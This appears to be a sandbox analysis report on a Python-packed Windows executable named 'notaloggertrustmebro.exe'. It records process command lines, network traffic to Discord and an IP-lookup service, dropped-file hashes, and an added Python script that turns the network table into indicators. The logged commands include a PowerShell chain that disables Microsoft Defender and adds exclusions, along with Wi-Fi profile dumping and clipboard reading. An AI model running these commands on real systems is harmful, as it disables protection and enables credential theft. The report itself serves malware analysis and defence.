C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
C:\Users\Admin\Downloads\notaloggertrustmebro.exe
"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
C:\Users\Admin\Downloads\notaloggertrustmebro.exe
"C:\Users\Admin\Downloads\notaloggertrustmebro.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| BE | 2.17.107.105:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 105.107.17.2.in-addr.arpa | udp |
| BE | 2.17.107.105:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | | udp |
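Most rows in the network table are noise: reverse (`in-addr.arpa`) lookups, the sandbox image's own Bing and mDNS traffic, and repeated connections to the same four hosts. The Python below is an added example, not part of this report, that condenses such a table into unique destinations, pairs each PTR query with the forward-resolved IP it reverses (unmatched PTRs are background telemetry, not sample activity), and tests for the external-IP-lookup-plus-Discord pairing that the report's "Looks up external IP address via web service" and "Legitimate hosting services abused" signatures describe. The rows are constructed from the table above; the list of hosts treated as background is an assumption.

```python
"""Condense a sandbox network table into IOCs (added example).

Separates DNS PTR queries from forward lookups, pairs each PTR with the
forward-resolved IP it reverses, and sets aside sandbox-image background
traffic (Bing, mDNS) so that only destinations the sample itself contacted
remain.  SAMPLE_TABLE is constructed from rows of the report above.
"""
import re
from collections import defaultdict

SAMPLE_TABLE = """
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.242.123.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
"""

# Assumption: hosts the Windows image talks to on its own; treated as noise.
BACKGROUND = re.compile(r"(^|\.)bing\.(com|net)$|^224\.0\.0\.251:", re.I)
PTR = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa$", re.I)


def parse_rows(text):
    """Parse '| country | dest | domain | proto |' rows into dicts."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            raise ValueError(f"unexpected column count: {line!r}")
        rows.append(dict(zip(("country", "dest", "domain", "proto"), cells)))
    return rows


def ptr_to_ip(name):
    """'233.130.159.162.in-addr.arpa' -> '162.159.130.233', else None."""
    m = PTR.fullmatch(name)
    return ".".join(reversed(m.groups())) if m else None


def summarize(rows):
    forward = defaultdict(set)   # host -> IPs actually connected to over TCP
    ptr = {}                     # reversed IP -> PTR name that was queried
    background = set()
    for r in rows:
        label = r["domain"] or r["dest"]   # mDNS rows carry no domain
        rev = ptr_to_ip(label)
        if rev:
            ptr[rev] = label
            continue
        if BACKGROUND.search(label):
            background.add(label)
            continue
        ips = forward[label]                # DNS-only rows still register the host
        if r["proto"] == "tcp":
            ips.add(r["dest"].rsplit(":", 1)[0])
    resolved = {ip for ips in forward.values() for ip in ips}
    return {
        "iocs": {host: sorted(ips) for host, ips in forward.items()},
        "ptr_matched": {ip: n for ip, n in ptr.items() if ip in resolved},
        "ptr_unmatched": {ip: n for ip, n in ptr.items() if ip not in resolved},
        "background": sorted(background),
    }


def exfil_pattern(summary):
    """External-IP lookup plus Discord over HTTPS: the webhook-exfil pairing
    typical of Python-packed stealers."""
    iocs = summary["iocs"]
    return bool(iocs.get("api.ipify.org")) and bool(iocs.get("discord.com"))


if __name__ == "__main__":
    s = summarize(parse_rows(SAMPLE_TABLE))
    for host, ips in s["iocs"].items():
        print(host, ips)
    print("unmatched PTRs:", s["ptr_unmatched"])
    print("exfil pattern:", exfil_pattern(s))
```

The unmatched PTR for `52.123.242.10` has no forward connection in the table, which is the usual signature of Windows telemetry resolving addresses the sample never touched; the matched PTRs for the Cloudflare-fronted Discord hosts are the sandbox resolving what the sample connected to. Block on the hostnames, not the IPs: `162.159.x.x` and `104.26.x.x` are shared Cloudflare ranges.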
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53207a5ca2ef5c7e976cbb3cb26d870 |
| SHA1 | 49a8cc44f53da77bb3dfb36fc7676ed54675db43 |
| SHA256 | 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23 |
| SHA512 | be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499 |
\??\pipe\LOCAL\crashpad_3988_KADAAEXRPJGWHHEA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ae54e9db2e89f2c54da8cc0bfcbd26bd |
| SHA1 | a88af6c673609ecbc51a1a60dfbc8577830d2b5d |
| SHA256 | 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af |
| SHA512 | e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fd55948dc6d984a216e62bbba4c84301 |
| SHA1 | abec860c0605d808392525f50ee072365d652e8a |
| SHA256 | fa0964c189ec3ec87a3f179fa667ffe5e9320b80fb7ea10a14ecb2baa3a952d2 |
| SHA512 | c7331f216f75927f03d08d225b7d7a461f7c405fe50f1077f2a5bff1aa821f657ab0a9da717a77f796f5fab2788500638987e7b98b23fef25b7a75dbb6a858f7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Unconfirmed 904369.crdownload
| MD5 | 1e79b60d975dc664b5affeab606a41fb |
| SHA1 | 19f9d849813263e2271af58cf8784ef0fce7ae8e |
| SHA256 | b2bdaf007e47f5a4eca9248a1bec1aac17c381c0ee6c160709c0226ec8a66c37 |
| SHA512 | f2d39968a61d74aa7b282da39cdf6e3282ff05a78449380fc71421c88ba752376aaebc0fa34e5a707bfabcdaa91c526da623a2e5feb0369db9b677a263607b46 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4eca4b4f418d7aa7a80ab68008f2bdd1 |
| SHA1 | 939ad87f238e656ba3bb341936f07394b7f3a65a |
| SHA256 | 6b393a4dc54ebdd33595917fa729d61d7b2d8b04780e311f34a986af4fc90ccf |
| SHA512 | 1d3209917fc447c6aa098242945ce18841d932b49a9def8f2fe6b1ff3c00c88ade0a864aac7f9b331b428076503fe60adb0d5951a178d9a95de7d784449fd2e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3b41af5ae5003b09000ffda4e970a793 |
| SHA1 | faa51868d63bac0ef152d40e607ad46e91287799 |
| SHA256 | 4f214025e99f475fecb51acc045f4272e4a94dfd07abec8e68b694b3a6f64a3d |
| SHA512 | fe337d8ef05d30bbcf86771b707022e0849d3a6758a7538ce4fc35d2959de162a7d5b8e5eee9fdb9177ca336ff2d15f8b9c2bc4370c2f6b9c5599cbb928cba68 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6ca3ff80c83c2d1a53ccd4af87667485 |
| SHA1 | 343b79c51fd6394ca7b39edfd9edc916f0b67866 |
| SHA256 | 230969181ec1e624dbcd661880a98ffee24f30975de971da43b8dfeb83ffd501 |
| SHA512 | 7feea6a28f6b77a77891a0ac7d34b5567ccdb9fdeed623587bf179d9f560e45f8991350cae99b0fdcca94aa1b47252629c72155e4309dfd2d502fc654f1893b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\python312.dll
| MD5 | 8f9e3a154ef42634941f6b8b0e7596d5 |
| SHA1 | bf6a86ed4fe5ef5cd6fa3481a57415abd7d89fa1 |
| SHA256 | cc947a9fcd6d569d60960758a6226e27dfe9ed8ca2cec3105ae99a711b1be3a9 |
| SHA512 | 42c2a57324c32fdf00ed671c8efe419e4dcb3842f630a2fddc9714285c27a6ca5d9e065ea31e0a7a5834cc8c78855984627891dc376a637815ac27f0cdcee519 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/5956-184-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\base_library.zip
| MD5 | 8dad91add129dca41dd17a332a64d593 |
| SHA1 | 70a4ec5a17ed63caf2407bd76dc116aca7765c0d |
| SHA256 | 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783 |
| SHA512 | 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\python3.dll
| MD5 | 79b02450d6ca4852165036c8d4eaed1f |
| SHA1 | ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4 |
| SHA256 | d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123 |
| SHA512 | 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416 |
memory/5956-194-0x00007FFEE9660000-0x00007FFEE966F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\pyexpat.pyd
| MD5 | cd422a6f821d5cfc56dc0f26b2b600cc |
| SHA1 | 5529327b32d2b11195946da66be134dad8e6a120 |
| SHA256 | 60a47ac9c1674198998338cf3caef2325bb722e62934310653f9dd01a1cb4109 |
| SHA512 | bfb5565ef94a06fe4149292ff21284f6ded1e11e6d3e23a110fdcc8118c60d3a14aba3726802945f90b2981d605098a99df5821c2bedfa4c2b5cc38ac8d681e5 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_hashlib.pyd
| MD5 | b67c993f7fb4fdc89874d3d2be56ac8e |
| SHA1 | 242409935bd0b75d20d39164983573f490f02c03 |
| SHA256 | 794ff644b85bbc5bbbeef42eea7997dc51c6cbb4eeb3605beef3a5c8243e1146 |
| SHA512 | a1c3ec87d23cb6f111c3e6a16da227f3ee223162cddf866975e060c1b49fb580f5a4c210b4bf483d56f2b666afa39b52951ddd34a8ee21ca0156a299a444073a |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_decimal.pyd
| MD5 | e359f1c12b1f0708770c4e35f225f424 |
| SHA1 | 62e55f31fda96b465761f2f28f079741d9df2bf7 |
| SHA256 | c5ff76699e65aba4c629cc060532447d3643fe1c7b34266f8f2bfdd6396d6613 |
| SHA512 | b884f6d54c123652621654b2bd0679cf0750ed955eee62aacb94e46e55778465c46d76e5b9ea8361a673165c4989044a6c19ac2e9af31f2e877ebbd3e2698e5f |
memory/5956-222-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\select.pyd
| MD5 | f55e6cc581308799114c0b3376bff92c |
| SHA1 | 85e9ef00240cf38b8afa434a285396b1355555b6 |
| SHA256 | f05fe1c21959ee25d30aaade30afaaf34fbd99524bdfb3ebee3cf8643ae5d1b6 |
| SHA512 | f0d48d228cc292c05712d3eb2b06125c78aefdf481ef245b6ef547c1794e8ca10c19a12dccdb77d1026a5352d0b79be223bdbeb5b08627f8bc9b88757bb587b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_queue.pyd
| MD5 | d21ed27b16a8ccfe002eea93ce4b9129 |
| SHA1 | 6dfbdac6480e56c84292c489bd217b080c001299 |
| SHA256 | 46f3f3e83a917bfc8733064ec2389343d0adf325e4feff3e45a9ba3038510cbe |
| SHA512 | 2c38f36c51094d113385e6816c2e4ac1a96094b983398639b2c25be806120383e3421abaf6446c30bd6e797c0a74f965f5a7a293f1f0d836a3b82e0265b70099 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\libcrypto-3.dll
| MD5 | ee4ebac30781c90c6fb6fdffa6bdd19a |
| SHA1 | 154eada82a520af85c1248b792edb716a72a19e0 |
| SHA256 | d9c01ab4545d4681ab057b572eb8590defd33bc44527bb4ef26a5f23cadbfd03 |
| SHA512 | fc9457046f262595024971047f06df5b5865e53536e8fc5d35a6e5c9da494e99cd2dbeb9d6d17e37b51169b88ed6cb6e5931474dbbab7350e1b4da8e7ee0576c |
memory/5956-233-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp
memory/5956-238-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp
memory/5956-237-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp
memory/5956-236-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp
memory/5956-243-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_sqlite3.pyd
| MD5 | 9a5b2c0290df382355e1205966f5e824 |
| SHA1 | 44cb64affc35515c97c73aaccb0457aa132f0a04 |
| SHA256 | ba72af58df3609949a449ba6a432f8bec0afeac93b512a305c98afc12471a0ae |
| SHA512 | 79c7ef5bc5110b78498ff5b11ef18422563409eb7eb6010c5ff435e98f6ed56d794246a6f80296bb0d00ad3e9814eca01f8ed72eeb3dd844cc40e6c7ddf2826b |
memory/5956-249-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp
memory/5956-250-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp
memory/5956-254-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp
memory/5956-257-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp
memory/5956-262-0x00007FFED8670000-0x00007FFED867B000-memory.dmp
memory/5956-268-0x00007FFED72A0000-0x00007FFED72AE000-memory.dmp
memory/5956-280-0x00007FFED62F0000-0x00007FFED62FC000-memory.dmp
memory/5956-281-0x00007FFED60A0000-0x00007FFED62E5000-memory.dmp
memory/5956-279-0x00007FFED6300000-0x00007FFED6312000-memory.dmp
memory/5956-282-0x00007FFED6060000-0x00007FFED6089000-memory.dmp
memory/5956-283-0x00007FFED6030000-0x00007FFED605E000-memory.dmp
memory/5956-278-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp
memory/5956-277-0x00007FFED6320000-0x00007FFED632D000-memory.dmp
memory/5956-276-0x00007FFED6330000-0x00007FFED633C000-memory.dmp
memory/5956-275-0x00007FFED6340000-0x00007FFED634C000-memory.dmp
memory/5956-274-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp
memory/5956-269-0x00007FFED7290000-0x00007FFED729C000-memory.dmp
memory/5956-273-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp
memory/5956-272-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp
memory/5956-271-0x00007FFED7270000-0x00007FFED727B000-memory.dmp
memory/5956-270-0x00007FFED7280000-0x00007FFED728B000-memory.dmp
memory/5956-267-0x00007FFED72B0000-0x00007FFED72BC000-memory.dmp
memory/5956-266-0x00007FFED72C0000-0x00007FFED72CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ooh3nfbc.1ss.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5748-296-0x0000026D56A50000-0x0000026D56A72000-memory.dmp
memory/5956-265-0x00007FFED7D00000-0x00007FFED7D0B000-memory.dmp
memory/5956-264-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp
memory/5956-263-0x00007FFED80D0000-0x00007FFED80DC000-memory.dmp
memory/5956-261-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp
memory/5956-260-0x00007FFED93F0000-0x00007FFED93FC000-memory.dmp
memory/5956-259-0x00007FFED9530000-0x00007FFED953B000-memory.dmp
memory/5956-258-0x00007FFEE0E30000-0x00007FFEE0E3B000-memory.dmp
memory/5956-256-0x00007FFED6350000-0x00007FFED646B000-memory.dmp
memory/5956-255-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp
memory/5956-253-0x00007FFEE36E0000-0x00007FFEE36EB000-memory.dmp
memory/5956-252-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp
memory/5956-251-0x00007FFED7300000-0x00007FFED7387000-memory.dmp
memory/5956-248-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp
memory/5956-246-0x00007FFED80E0000-0x00007FFED8115000-memory.dmp
memory/5956-245-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp
memory/5956-242-0x00007FFED8D90000-0x00007FFED8DBD000-memory.dmp
memory/5956-241-0x00007FFED8C20000-0x00007FFED8C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_overlapped.pyd
| MD5 | a8b083be8a5b90ad5962df143b6a5c75 |
| SHA1 | f69fb708e97125c907f966e0ca3bb858673b0421 |
| SHA256 | fd338e1c6596e96d16bd1faffd233a30c759c006bbe4c4032c0b99a07180d477 |
| SHA512 | 8a56b857e91da2a7d67fc38254abe2d20fdb56fe39e4983cbcb916bec76b695c98e65b19d9f24f7f2bb5d75d6c1a3e10e27f8a0827387e4613c5027b87552888 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_asyncio.pyd
| MD5 | c4e239aa9041cd3a67d03b0476cd9b95 |
| SHA1 | 4d7d2ee3320e140d94f41cd3224b2740edb156df |
| SHA256 | 617eb50897916095a22494d07e5dbe6c427331c9f983b0d4c1a7279513cd6743 |
| SHA512 | 6168531b24813504adfa56be4a83b7220bc2a3ef4cf9fc67eb72d10f921331927bd4fe4e27b5527cd8b6148071f0f93930000d735338a5e9351fe3b4a7bc35ad |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\libssl-3.dll
| MD5 | a160ff459e97bf9514ef28281dbc6c81 |
| SHA1 | 730510497c9a4d28444e5243bc5f44a91643d725 |
| SHA256 | 2674c58e05448f8b60d7b2182bbcd2efe386d4b7b1104dd1f753112638cb8e00 |
| SHA512 | 04651ca40a806f0596434e0bbe30c7458daf316174ecdbf142cbddc21dbac5f0db58dc284bce5b7c6949545720021b2bd1f768ebf8c2e379a17dc6dc2fb2b46d |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_ssl.pyd
| MD5 | 339143cd70861741a54eb9e7e3a04916 |
| SHA1 | e5b9ed5687ae698671c6cbd67555c791978807cd |
| SHA256 | 8fcbe509bc6214d12207698d4df074d1a05d4f1c91afb7340f296e51d2045509 |
| SHA512 | 6313b5be550e132881f81b65d5e6ef6b265e95e2068115c026876ac0bdec3029b87093fca254ad816b7030ea4853378b6d5798b908c003bb5544a13f69ea426b |
memory/5956-232-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp
memory/5956-230-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp
memory/5956-228-0x00007FFEE5CB0000-0x00007FFEE5CBD000-memory.dmp
memory/5956-226-0x00007FFEE6770000-0x00007FFEE677D000-memory.dmp
memory/5956-224-0x00007FFED8D70000-0x00007FFED8D89000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_socket.pyd
| MD5 | 0f65c39912ad241bb256e83cef9b6040 |
| SHA1 | f9d183b1fdbe99521aecd98781479765596d76d6 |
| SHA256 | 2dd34b7b49caf4a1f269f48beaf48deee7130932daf8e7fe2b48f5cc901de1da |
| SHA512 | 4669add920acfa8387fee674ed9e52a0fc780cc45f3a1fe1cc0717b754bf7f759b23c1ecc181bb3c7e779be118f04848c1c023e7a51639bba19d0046c84f7cbc |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\VCRUNTIME140_1.dll
| MD5 | f8dfa78045620cf8a732e67d1b1eb53d |
| SHA1 | ff9a604d8c99405bfdbbf4295825d3fcbc792704 |
| SHA256 | a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5 |
| SHA512 | ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_wmi.pyd
| MD5 | f27f263f60aede353e417b00f56cd21e |
| SHA1 | f9748f73d137878f2a852649c1723dd43e4e44db |
| SHA256 | f9cdf7c964f0ee756df4a63daabe652743a06b7a5b8009c7c0a8d1445e5793af |
| SHA512 | ba7b5878791d91e2574a855dd3564c51bc34221932be87791a3b0045fbe01c494e92fe6f014d64c309486f0d3476df178e0d53a98326484c7d761014ae1cc604 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_uuid.pyd
| MD5 | 353e11301ea38261e6b1cb261a81e0fe |
| SHA1 | 607c5ebe67e29eabc61978fb52e4ec23b9a3348e |
| SHA256 | d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899 |
| SHA512 | fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_multiprocessing.pyd
| MD5 | 36785e939d8a7f067f457ad18f69b498 |
| SHA1 | 7da5c6c0d81cb16bd142e79afa345c803e5ecc84 |
| SHA256 | 96403254e1592b2930d2c3510ca37e49ed22f0de2d2fa8a7924b25e5585667f4 |
| SHA512 | afd1e021f9b42a3ff720e965863a14bd8bf48ec97c1116e4acb8a193a7e4fe12cbe2ea555cac09423bcc5126b193211d6469a830f01fa1b0c80d07b40169f0b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI55082\_cffi_backend.cp312-win_amd64.pyd
| MD5 | 5ecaaa900fdabc7207cf938e23f5d956 |
| SHA1 | 40d4d67e8ba1737caa5e0ab69cb08d7f7f4215ae |
| SHA256 | b2ee6d811dc1d94a761ffe691006e23ad00adeb9b710c4f8e7d59f177401aaba |
